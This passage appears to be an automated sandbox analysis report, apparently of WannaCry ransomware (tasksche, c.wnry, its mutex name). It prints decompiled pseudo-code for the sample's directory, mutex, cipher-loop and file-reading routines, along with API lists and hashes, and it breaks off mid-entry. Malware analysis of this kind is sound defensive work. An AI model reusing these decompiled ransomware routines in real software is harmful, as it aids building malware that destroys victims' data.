                                                          0x004070a7
                                                          0x004070a9
                                                          0x004070ab
                                                          0x004070b1
                                                          0x004070b1
                                                          0x004070b3
                                                          0x004070b6
                                                          0x004070b7
                                                          0x004070bd
                                                          0x004070bf
                                                          0x004070ca
                                                          0x004070cf
                                                          0x004070df
                                                          0x004070e4
                                                          0x004070e7
                                                          0x004070f1
                                                          0x004070fb
                                                          0x00407101
                                                          0x0040710a
                                                          0x00407118
                                                          0x00407121
                                                          0x00000000
                                                          0x0040712c
                                                          0x00407121
                                                          0x00407135

                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(?,?,?), ref: 00407083
                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 00407091
                                                          • memcpy.MSVCRT(?,0000002F,0000002F,?,?,?), ref: 004070CA
                                                          • strcpy.MSVCRT(00000000,?,?,?), ref: 004070FB
                                                          • strcat.MSVCRT(00000000,0000002F,?,?), ref: 0040710A
                                                          • GetFileAttributesA.KERNEL32(00000000,?,?), ref: 00407118
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesCreateDirectoryFile$memcpystrcatstrcpy
                                                          • String ID:
                                                          • API String ID: 2935503933-0
                                                          • Opcode ID: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                                                          • Instruction ID: 50ba023859918e707bf45bf33fbe73a6a33da9a39eec2eddc6b78618a8cc3524
                                                          • Opcode Fuzzy Hash: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                                                          • Instruction Fuzzy Hash: 1A112B72C0821456CB305B749D88FD7776C9B11320F1403BBE595B32C2DA78BD898669
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00401EFF(intOrPtr _a4) {
                                                          				char _v104;
                                                          				void* _t9;
                                                          				void* _t11;
                                                          				void* _t12;
                                                          
                                                          				sprintf( &_v104, "%s%d", "Global\\MsWinZonesCacheCounterMutexA", 0);
                                                          				_t12 = 0;
                                                          				if(_a4 <= 0) {
                                                          					L3:
                                                          					return 0;
                                                          				} else {
                                                          					goto L1;
                                                          				}
                                                          				while(1) {
                                                          					L1:
                                                          					_t9 = OpenMutexA(0x100000, 1,  &_v104);
                                                          					if(_t9 != 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0x3e8);
                                                          					_t12 = _t12 + 1;
                                                          					if(_t12 < _a4) {
                                                          						continue;
                                                          					}
                                                          					goto L3;
                                                          				}
                                                          				CloseHandle(_t9);
                                                          				_t11 = 1;
                                                          				return _t11;
                                                          			}







                                                          0x00401f16
                                                          0x00401f1c
                                                          0x00401f24
                                                          0x00401f4c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00401f26
                                                          0x00401f26
                                                          0x00401f31
                                                          0x00401f39
                                                          0x00000000
                                                          0x00000000
                                                          0x00401f40
                                                          0x00401f46
                                                          0x00401f4a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00401f4a
                                                          0x00401f52
                                                          0x00401f5a
                                                          0x00000000

                                                          APIs
                                                          • sprintf.MSVCRT(?,%s%d,Global\MsWinZonesCacheCounterMutexA,00000000), ref: 00401F16
                                                          • OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
                                                          • Sleep.KERNEL32(000003E8), ref: 00401F40
                                                          • CloseHandle.KERNEL32(00000000), ref: 00401F52
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleMutexOpenSleepsprintf
                                                          • String ID: %s%d$Global\MsWinZonesCacheCounterMutexA
                                                          • API String ID: 2780352083-2959021817
                                                          • Opcode ID: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                                                          • Instruction ID: f4a3b48a0bafa41ae68b0177be176e29d76f271436d11399ade0a1af8f7a19ee
                                                          • Opcode Fuzzy Hash: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                                                          • Instruction Fuzzy Hash: 92F0E931A40305BBDB20EBA49E4AB9B7758AB04B40F104036F945FA0D2DBB8D54586D8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 59%
                                                          			E00403A77(void* __ecx, void* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                          				void* _v12;
                                                          				char _v16;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v48;
                                                          				signed int _t121;
                                                          				int _t124;
                                                          				intOrPtr* _t126;
                                                          				intOrPtr _t127;
                                                          				int _t131;
                                                          				intOrPtr* _t133;
                                                          				intOrPtr _t135;
                                                          				intOrPtr _t137;
                                                          				signed int _t139;
                                                          				signed int _t140;
                                                          				signed int _t143;
                                                          				signed int _t150;
                                                          				intOrPtr _t160;
                                                          				int _t161;
                                                          				int _t163;
                                                          				signed int _t164;
                                                          				signed int _t165;
                                                          				intOrPtr _t168;
                                                          				void* _t169;
                                                          				signed int _t170;
                                                          				signed int _t172;
                                                          				signed int _t175;
                                                          				signed int _t178;
                                                          				intOrPtr _t194;
                                                          				void* _t195;
                                                          				void* _t196;
                                                          				void* _t197;
                                                          				intOrPtr _t198;
                                                          				void* _t201;
                                                          
                                                          				_t197 = __ecx;
                                                          				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                          					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                                                          					_push(0x40d570);
                                                          					_push( &_v16);
                                                          					L0040776E();
                                                          				}
                                                          				_t121 = _a12;
                                                          				if(_t121 == 0) {
                                                          					L15:
                                                          					__imp__??0exception@@QAE@ABQBD@Z(0x40f574);
                                                          					_push(0x40d570);
                                                          					_push( &_v16);
                                                          					L0040776E();
                                                          					_push( &_v16);
                                                          					_push(0);
                                                          					_push(_t197);
                                                          					_t198 = _v36;
                                                          					_t194 = _v32;
                                                          					_t168 =  *((intOrPtr*)(_t198 + 0x30));
                                                          					_t160 =  *((intOrPtr*)(_t198 + 0x34));
                                                          					_t71 = _t194 + 0xc; // 0x40d568
                                                          					_v48 =  *_t71;
                                                          					_v32 = _t168;
                                                          					if(_t168 > _t160) {
                                                          						_t160 =  *((intOrPtr*)(_t198 + 0x2c));
                                                          					}
                                                          					_t75 = _t194 + 0x10; // 0x19930520
                                                          					_t124 =  *_t75;
                                                          					_t161 = _t160 - _t168;
                                                          					if(_t161 > _t124) {
                                                          						_t161 = _t124;
                                                          					}
                                                          					if(_t161 != 0 && _a8 == 0xfffffffb) {
                                                          						_a8 = _a8 & 0x00000000;
                                                          					}
                                                          					 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t161;
                                                          					 *(_t194 + 0x10) = _t124 - _t161;
                                                          					_t126 =  *((intOrPtr*)(_t198 + 0x38));
                                                          					if(_t126 != 0) {
                                                          						_t137 =  *_t126( *((intOrPtr*)(_t198 + 0x3c)), _t168, _t161);
                                                          						 *((intOrPtr*)(_t198 + 0x3c)) = _t137;
                                                          						_t201 = _t201 + 0xc;
                                                          						 *((intOrPtr*)(_t194 + 0x30)) = _t137;
                                                          					}
                                                          					if(_t161 != 0) {
                                                          						memcpy(_v12, _a4, _t161);
                                                          						_v12 = _v12 + _t161;
                                                          						_t201 = _t201 + 0xc;
                                                          						_a4 = _a4 + _t161;
                                                          					}
                                                          					_t127 =  *((intOrPtr*)(_t198 + 0x2c));
                                                          					if(_a4 == _t127) {
                                                          						_t169 =  *((intOrPtr*)(_t198 + 0x28));
                                                          						_a4 = _t169;
                                                          						if( *((intOrPtr*)(_t198 + 0x34)) == _t127) {
                                                          							 *((intOrPtr*)(_t198 + 0x34)) = _t169;
                                                          						}
                                                          						_t99 = _t194 + 0x10; // 0x19930520
                                                          						_t131 =  *_t99;
                                                          						_t163 =  *((intOrPtr*)(_t198 + 0x34)) - _t169;
                                                          						if(_t163 > _t131) {
                                                          							_t163 = _t131;
                                                          						}
                                                          						if(_t163 != 0 && _a8 == 0xfffffffb) {
                                                          							_a8 = _a8 & 0x00000000;
                                                          						}
                                                          						 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t163;
                                                          						 *(_t194 + 0x10) = _t131 - _t163;
                                                          						_t133 =  *((intOrPtr*)(_t198 + 0x38));
                                                          						if(_t133 != 0) {
                                                          							_t135 =  *_t133( *((intOrPtr*)(_t198 + 0x3c)), _t169, _t163);
                                                          							 *((intOrPtr*)(_t198 + 0x3c)) = _t135;
                                                          							_t201 = _t201 + 0xc;
                                                          							 *((intOrPtr*)(_t194 + 0x30)) = _t135;
                                                          						}
                                                          						if(_t163 != 0) {
                                                          							memcpy(_v12, _a4, _t163);
                                                          							_v12 = _v12 + _t163;
                                                          							_a4 = _a4 + _t163;
                                                          						}
                                                          					}
                                                          					 *(_t194 + 0xc) = _v12;
                                                          					 *((intOrPtr*)(_t198 + 0x30)) = _a4;
                                                          					return _a8;
                                                          				} else {
                                                          					_t170 =  *(_t197 + 0x3cc);
                                                          					if(_t121 % _t170 != 0) {
                                                          						goto L15;
                                                          					} else {
                                                          						if(_a16 != 1) {
                                                          							_t195 = _a4;
                                                          							_t139 = _a12;
                                                          							_a16 = 0;
                                                          							_t164 = _a8;
                                                          							if(_a16 != 2) {
                                                          								_t140 = _t139 / _t170;
                                                          								if(_t140 > 0) {
                                                          									do {
                                                          										E00403797(_t197, _t195, _t164);
                                                          										_t172 =  *(_t197 + 0x3cc);
                                                          										_t195 = _t195 + _t172;
                                                          										_t143 = _a12 / _t172;
                                                          										_t164 = _t164 + _t172;
                                                          										_a16 = _a16 + 1;
                                                          									} while (_a16 < _t143);
                                                          									return _t143;
                                                          								}
                                                          							} else {
                                                          								_t140 = _t139 / _t170;
                                                          								if(_t140 > 0) {
                                                          									do {
                                                          										E0040350F(_t197, _t197 + 0x3f0, _t164);
                                                          										E00403A28(_t197, _t164, _t195);
                                                          										memcpy(_t197 + 0x3f0, _t195,  *(_t197 + 0x3cc));
                                                          										_t175 =  *(_t197 + 0x3cc);
                                                          										_t201 = _t201 + 0xc;
                                                          										_t150 = _a12 / _t175;
                                                          										_t195 = _t195 + _t175;
                                                          										_t164 = _t164 + _t175;
                                                          										_a16 = _a16 + 1;
                                                          									} while (_a16 < _t150);
                                                          									return _t150;
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_t196 = _a4;
                                                          							_t140 = _a12 / _t170;
                                                          							_a16 = 0;
                                                          							_t165 = _a8;
                                                          							if(_t140 > 0) {
                                                          								do {
                                                          									E00403797(_t197, _t196, _t165);
                                                          									E00403A28(_t197, _t165, _t197 + 0x3f0);
                                                          									memcpy(_t197 + 0x3f0, _t196,  *(_t197 + 0x3cc));
                                                          									_t178 =  *(_t197 + 0x3cc);
                                                          									_t201 = _t201 + 0xc;
                                                          									_t140 = _a12 / _t178;
                                                          									_t196 = _t196 + _t178;
                                                          									_t165 = _t165 + _t178;
                                                          									_a16 = _a16 + 1;
                                                          								} while (_a16 < _t140);
                                                          							}
                                                          						}
                                                          						return _t140;
                                                          					}
                                                          				}
                                                          			}





































                                                          0x00403a7f
                                                          0x00403a87
                                                          0x00403a91
                                                          0x00403a9a
                                                          0x00403a9f
                                                          0x00403aa0
                                                          0x00403aa0
                                                          0x00403aa5
                                                          0x00403aaa
                                                          0x00403bba
                                                          0x00403bc2
                                                          0x00403bcb
                                                          0x00403bd0
                                                          0x00403bd1
                                                          0x00403bd9
                                                          0x00403bda
                                                          0x00403bdb
                                                          0x00403bdc
                                                          0x00403be0
                                                          0x00403be3
                                                          0x00403be6
                                                          0x00403be9
                                                          0x00403bee
                                                          0x00403bf1
                                                          0x00403bf4
                                                          0x00403bf6
                                                          0x00403bf6
                                                          0x00403bf9
                                                          0x00403bf9
                                                          0x00403bfc
                                                          0x00403c00
                                                          0x00403c02
                                                          0x00403c02
                                                          0x00403c06
                                                          0x00403c0e
                                                          0x00403c0e
                                                          0x00403c12
                                                          0x00403c17
                                                          0x00403c1a
                                                          0x00403c1f
                                                          0x00403c26
                                                          0x00403c28
                                                          0x00403c2b
                                                          0x00403c2e
                                                          0x00403c2e
                                                          0x00403c33
                                                          0x00403c3c
                                                          0x00403c41
                                                          0x00403c44
                                                          0x00403c47
                                                          0x00403c47
                                                          0x00403c4a
                                                          0x00403c50
                                                          0x00403c52
                                                          0x00403c58
                                                          0x00403c5b
                                                          0x00403c5d
                                                          0x00403c5d
                                                          0x00403c63
                                                          0x00403c63
                                                          0x00403c66
                                                          0x00403c6a
                                                          0x00403c6c
                                                          0x00403c6c
                                                          0x00403c70
                                                          0x00403c78
                                                          0x00403c78
                                                          0x00403c7c
                                                          0x00403c81
                                                          0x00403c84
                                                          0x00403c89
                                                          0x00403c90
                                                          0x00403c92
                                                          0x00403c95
                                                          0x00403c98
                                                          0x00403c98
                                                          0x00403c9d
                                                          0x00403ca6
                                                          0x00403cab
                                                          0x00403cb1
                                                          0x00403cb1
                                                          0x00403c9d
                                                          0x00403cb7
                                                          0x00403cbd
                                                          0x00403cc7
                                                          0x00403ab0
                                                          0x00403ab0
                                                          0x00403abc
                                                          0x00000000
                                                          0x00403ac2
                                                          0x00403ac6
                                                          0x00403b2c
                                                          0x00403b2f
                                                          0x00403b32
                                                          0x00403b35
                                                          0x00403b38
                                                          0x00403b8d
                                                          0x00403b91
                                                          0x00403b93
                                                          0x00403b97
                                                          0x00403b9c
                                                          0x00403ba7
                                                          0x00403ba9
                                                          0x00403bab
                                                          0x00403bad
                                                          0x00403bb0
                                                          0x00000000
                                                          0x00403b93
                                                          0x00403b3a
                                                          0x00403b3c
                                                          0x00403b40
                                                          0x00403b42
                                                          0x00403b4c
                                                          0x00403b55
                                                          0x00403b68
                                                          0x00403b6d
                                                          0x00403b78
                                                          0x00403b7b
                                                          0x00403b7d
                                                          0x00403b7f
                                                          0x00403b81
                                                          0x00403b84
                                                          0x00000000
                                                          0x00403b42
                                                          0x00403b40
                                                          0x00403ac8
                                                          0x00403acb
                                                          0x00403ace
                                                          0x00403ad0
                                                          0x00403ad3
                                                          0x00403ad8
                                                          0x00403ada
                                                          0x00403ade
                                                          0x00403aed
                                                          0x00403b00
                                                          0x00403b05
                                                          0x00403b10
                                                          0x00403b13
                                                          0x00403b15
                                                          0x00403b17
                                                          0x00403b19
                                                          0x00403b1c
                                                          0x00403ada
                                                          0x00403ad8
                                                          0x00403b25
                                                          0x00403b25
                                                          0x00403abc

                                                          APIs
                                                          • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00000001), ref: 00403A91
                                                          • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403AA0
                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B00
                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B68
                                                          • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574,?,?,?,?,?,00000001), ref: 00403BC2
                                                          • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403BD1
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ??0exception@@ExceptionThrowmemcpy
                                                          • String ID:
                                                          • API String ID: 2382887404-0
                                                          • Opcode ID: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                                                          • Instruction ID: 9805a50700f74263afb1320d00d27f30e93ca80038ec105a2d2f515762341bf2
                                                          • Opcode Fuzzy Hash: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                                                          • Instruction Fuzzy Hash: 8541C870B40206ABDB14DE65DD81D9B77BEEB84309B00443FF815B3281D778AB15C759
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • fopen.MSVCRT(c.wnry,0040E018), ref: 0040101B
                                                          • fread.MSVCRT(?,0000030C,00000001,00000000), ref: 0040103F
                                                          • fwrite.MSVCRT(?,0000030C,00000001,00000000), ref: 00401047
                                                          • fclose.MSVCRT(00000000), ref: 00401058
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: fclosefopenfreadfwrite
                                                          • String ID: c.wnry
                                                          • API String ID: 4000964834-3240288721
                                                          • Opcode ID: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                                                          • Instruction ID: 4fc4ee2583eead98f325da0eb4a8e2a7a7827d82b7f69226d67b1691b23a23d5
                                                          • Opcode Fuzzy Hash: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                                                          • Instruction Fuzzy Hash: 0CF05931204260ABCA301F656D4AA277B10DBC4F61F10083FF1C1F40E2CABD44C296BE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 24%
                                                          			E004018F9(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
                                                          				struct _OVERLAPPED* _v8;
                                                          				char _v20;
                                                          				long _v32;
                                                          				struct _OVERLAPPED* _v36;
                                                          				long _v40;
                                                          				signed int _v44;
                                                          				void* _t18;
                                                          				void* _t28;
                                                          				long _t34;
                                                          				intOrPtr _t38;
                                                          
                                                          				_push(0xffffffff);
                                                          				_push(0x4081f0);
                                                          				_push(0x4076f4);
                                                          				_push( *[fs:0x0]);
                                                          				 *[fs:0x0] = _t38;
                                                          				_v44 = _v44 | 0xffffffff;
                                                          				_v32 = 0;
                                                          				_v36 = 0;
                                                          				_v8 = 0;
                                                          				_t18 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
                                                          				_v44 = _t18;
                                                          				if(_t18 != 0xffffffff) {
                                                          					_t34 = GetFileSize(_t18, 0);
                                                          					_v40 = _t34;
                                                          					if(_t34 != 0xffffffff && _t34 <= 0x19000) {
                                                          						_t28 = GlobalAlloc(0, _t34);
                                                          						_v36 = _t28;
                                                          						if(_t28 != 0 && ReadFile(_v44, _t28, _t34,  &_v32, 0) != 0) {
                                                          							_push(_a8);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push(_v32);
                                                          							_push(_t28);
                                                          							_push(_a4);
                                                          							if( *0x40f898() != 0) {
                                                          								_push(1);
                                                          								_pop(0);
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_push(0xffffffff);
                                                          				_push( &_v20);
                                                          				L004076FA();
                                                          				 *[fs:0x0] = _v20;
                                                          				return 0;
                                                          			}













                                                          0x004018fc
                                                          0x004018fe
                                                          0x00401903
                                                          0x0040190e
                                                          0x0040190f
                                                          0x0040191c
                                                          0x00401922
                                                          0x00401925
                                                          0x00401928
                                                          0x0040193a
                                                          0x00401940
                                                          0x00401946
                                                          0x00401950
                                                          0x00401952
                                                          0x00401958
                                                          0x0040196a
                                                          0x0040196c
                                                          0x00401971
                                                          0x00401987
                                                          0x0040198a
                                                          0x0040198b
                                                          0x0040198c
                                                          0x0040198f
                                                          0x00401990
                                                          0x0040199b
                                                          0x0040199d
                                                          0x0040199f
                                                          0x0040199f
                                                          0x0040199b
                                                          0x00401971
                                                          0x00401958
                                                          0x004019a0
                                                          0x004019a5
                                                          0x004019a6
                                                          0x004019d5
                                                          0x004019e0

                                                          APIs
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040193A
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040194A
                                                          • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 00401964
                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,?,00000000,?,?,?,?,?,?,00401448,?), ref: 0040197D
                                                          • _local_unwind2.MSVCRT(?,000000FF,?,?,?,?,?,?,00401448,?), ref: 004019A6
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$AllocCreateGlobalReadSize_local_unwind2
                                                          • String ID:
                                                          • API String ID: 2811923685-0
                                                          • Opcode ID: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                                                          • Instruction ID: fb063a64e2dc49fc25d010f75d45645ced701e765f932c996de96a45c5b9f027
                                                          • Opcode Fuzzy Hash: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                                                          • Instruction Fuzzy Hash: B62160B1901624AFCB209B99CD48FDF7E78EB097B0F54022AF525B22E0D7785805C6AC
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 97%
                                                          			E00405BAE(CHAR* _a4, intOrPtr _a8, long _a12, void* _a16) {
                                                          				char _v5;
                                                          				char _v6;
                                                          				long _t30;
                                                          				char _t32;
                                                          				long _t34;
                                                          				void* _t46;
                                                          				intOrPtr* _t49;
                                                          				long _t50;
                                                          
                                                          				_t30 = _a12;
                                                          				if(_t30 == 1 || _t30 == 2 || _t30 == 3) {
                                                          					_t49 = _a16;
                                                          					_t46 = 0;
                                                          					_v6 = 0;
                                                          					 *_t49 = 0;
                                                          					_v5 = 0;
                                                          					if(_t30 == 1) {
                                                          						_t46 = _a4;
                                                          						_v5 = 0;
                                                          						L11:
                                                          						_t30 = SetFilePointer(_t46, 0, 0, 1);
                                                          						_v6 = _t30 != 0xffffffff;
                                                          						L12:
                                                          						_push(0x20);
                                                          						L00407700();
                                                          						_t50 = _t30;
                                                          						if(_a12 == 1 || _a12 == 2) {
                                                          							 *_t50 = 1;
                                                          							 *((char*)(_t50 + 0x10)) = _v5;
                                                          							_t32 = _v6;
                                                          							 *((char*)(_t50 + 1)) = _t32;
                                                          							 *(_t50 + 4) = _t46;
                                                          							 *((char*)(_t50 + 8)) = 0;
                                                          							 *((intOrPtr*)(_t50 + 0xc)) = 0;
                                                          							if(_t32 != 0) {
                                                          								 *((intOrPtr*)(_t50 + 0xc)) = SetFilePointer(_t46, 0, 0, 1);
                                                          							}
                                                          						} else {
                                                          							 *_t50 = 0;
                                                          							 *((intOrPtr*)(_t50 + 0x14)) = _a4;
                                                          							 *((char*)(_t50 + 1)) = 1;
                                                          							 *((char*)(_t50 + 0x10)) = 0;
                                                          							 *((intOrPtr*)(_t50 + 0x18)) = _a8;
                                                          							 *((intOrPtr*)(_t50 + 0x1c)) = 0;
                                                          							 *((intOrPtr*)(_t50 + 0xc)) = 0;
                                                          						}
                                                          						 *_a16 = 0;
                                                          						_t34 = _t50;
                                                          						goto L18;
                                                          					}
                                                          					if(_t30 != 2) {
                                                          						goto L12;
                                                          					}
                                                          					_t46 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                                                          					if(_t46 != 0xffffffff) {
                                                          						_v5 = 1;
                                                          						goto L11;
                                                          					}
                                                          					 *_t49 = 0x200;
                                                          					goto L8;
                                                          				} else {
                                                          					 *_a16 = 0x10000;
                                                          					L8:
                                                          					_t34 = 0;
                                                          					L18:
                                                          					return _t34;
                                                          				}
                                                          			}











                                                          0x00405bb2
                                                          0x00405bbb
                                                          0x00405bd2
                                                          0x00405bd7
                                                          0x00405bdc
                                                          0x00405bdf
                                                          0x00405be1
                                                          0x00405be4
                                                          0x00405c18
                                                          0x00405c1b
                                                          0x00405c24
                                                          0x00405c29
                                                          0x00405c32
                                                          0x00405c36
                                                          0x00405c36
                                                          0x00405c38
                                                          0x00405c42
                                                          0x00405c44
                                                          0x00405c6c
                                                          0x00405c6f
                                                          0x00405c72
                                                          0x00405c77
                                                          0x00405c7a
                                                          0x00405c7d
                                                          0x00405c80
                                                          0x00405c83
                                                          0x00405c90
                                                          0x00405c90
                                                          0x00405c4c
                                                          0x00405c4f
                                                          0x00405c51
                                                          0x00405c57
                                                          0x00405c5b
                                                          0x00405c5e
                                                          0x00405c61
                                                          0x00405c64
                                                          0x00405c64
                                                          0x00405c96
                                                          0x00405c98
                                                          0x00000000
                                                          0x00405c98
                                                          0x00405be9
                                                          0x00000000
                                                          0x00000000
                                                          0x00405c04
                                                          0x00405c09
                                                          0x00405c20
                                                          0x00000000
                                                          0x00405c20
                                                          0x00405c0b
                                                          0x00000000
                                                          0x00405bc7
                                                          0x00405bca
                                                          0x00405c11
                                                          0x00405c11
                                                          0x00405c9a
                                                          0x00405c9e
                                                          0x00405c9e

                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001), ref: 00405BFE
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
                                                          • ??2@YAPAXI@Z.MSVCRT(00000020,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000,004020D5,?), ref: 00405C38
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Pointer$??2@Create
                                                          • String ID:
                                                          • API String ID: 1331958074-0
                                                          • Opcode ID: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                                                          • Instruction ID: 771dcc1d5a31089dd4cc2aab62cbbe5a226dda330bf0289da8f54b52fc8588cb
                                                          • Opcode Fuzzy Hash: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
